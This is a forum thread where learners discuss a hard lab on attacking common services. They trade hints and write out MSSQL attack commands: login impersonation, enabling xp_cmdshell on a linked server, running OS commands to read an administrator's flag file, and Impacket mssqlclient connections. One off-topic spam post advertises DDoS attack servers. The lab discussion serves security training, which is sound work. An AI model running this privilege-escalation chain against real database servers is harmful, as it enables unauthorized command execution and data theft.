Attacking Common Services - Hard

i am getting this error
dsp_desc_bind: Memory allocation failure for column #1

well stuck at last point… trying to execute the read statement on local link server and getting this error

dsp_desc_bind: Memory allocation failure for column #1
ANy idea… I think it a bug…

This lab isn’t hard, it’s literally impossible given the module teachings.
I know they are trying so hard to make a reputable certification, but this is reaching stupidity levels. I am here to learn, and to learn in a easy way. I am not here to digest overcomplexed concepts.

I am a little stuck here. I have been able to RDP to the server but I am having problems connecting the the SQL server.

PS C:\Users\f*****>PS C:\Users\f*****> sqlcmd -S SQLEXPRESS -U f***** -P '********' -y 30 -Y 30
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [53]. .
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..
PS C:\Users\f*****>

Am I going down the wrong path here?

Any hints would be greatly appreciated.

I figured out that

  1. Need to use computer name
  2. Do not need to specify the user creds in this case.

In my opinion, this hard lab was easier than the medium lab. I struggled on the medium lab trying to scan all ports with nmap

John is testadmin on the linked server. You are enabling xp_cmdshell on the linked server, which in turn allows you to run commands through the linked server…something like that :wink:

Although it is not obvious, one of the accounts have admin privs but not in the local instance. When you get the flag try dealing with quotes. There’s an example of it on module course.

shoutout to chagpt for solving this for me. just ask it how to enable xp_cmdshell

if any one have a problem with getting the flag with sqsh try mssqlclient it should work fine
and if you have problem with the encryption with mssqclient use this one
python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -p 1433 USER@IP -windows-auth
everything will work alright i guess now

thx bro for saving my time, :hugs:
i do it with
#impacket-mssqlclient -p 1433 fiona@10.129.0.0 -windows-auth

Definitely agree with you !

Attacking Common Services - Hard
Submit the contents of the flag.txt file on the Administrator Desktop.

I’m stuck here, I first managed to sqlcmd and impersontated as j user whom I found a linked database here I stoped.
What I have tried so far

  1. to imperonate again as the new user from the “identified linked servers” to enabled xp_cmdshell
  2. read the bulk file from the administrator folder

both giving me ‘you don’t have permission’

Edit: I have found it, I ran the reading local file command within exec() at the linked database. Very impressive I learnt new stuff doing this. thanks @Baudejas

1 Like

Hi, could you explain why it’s LOCAL.TEST.LINKED.SRV and not the other? When I performed select srvname, isremote from sysservers, it was actually WINSRV02\SQLEXPRESS that returned 1

nope,

dont make this one to complicated. There a multiple ways.

Just use cmdshell and from there you can do anything with system rights. f.e read the file, or give admin permissions to a user and go from there :slight_smile:

Running SQL when you do not want to get with DDoS attacks, get a free DDOS attack RDP server, and running these commands need some admin privileges, so looking to get DDOS protection RDP server with admin access, like admin RDP.

This particular comment helped me tremendously.
This MSSQL stuff is super difficult, but I have a feeling the cert is going to require a fair bit of traversal here. Thank you!

Hi, I get the same error about mapping. Could you tell me what’s wrong and how to solve it? Many thanks

Nevermind, solved it. It was a tough one I must admit but very satisfying in the end.

Hello, i am stuck an really need help. By my knowledge, the following i am trying should work. Can somebody say me what i am doing wrong?

Error:
[-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object ‘xp_cmdshell’, database ‘mssqlsystemresource’, schema ‘sys’.

Commands i use

EXECUTE AS LOGIN = ‘john’

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure ‘show advanced options’, 1

EXEC (‘RECONFIGURE’) AT [LOCAL.TEST.LINKED.SRV]

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure ‘xp_cmdshell’, 1

EXEC (‘RECONFIGURE’) AT [LOCAL.TEST.LINKED.SRV]

EXEC(‘EXECUTE AS LOGIN = ‘‘john’’; EXEC xp_cmdshell ‘‘type C:\users\administrator\desktop\flag.txt’’’) AT [LOCAL.TEST.LINKED.SRV]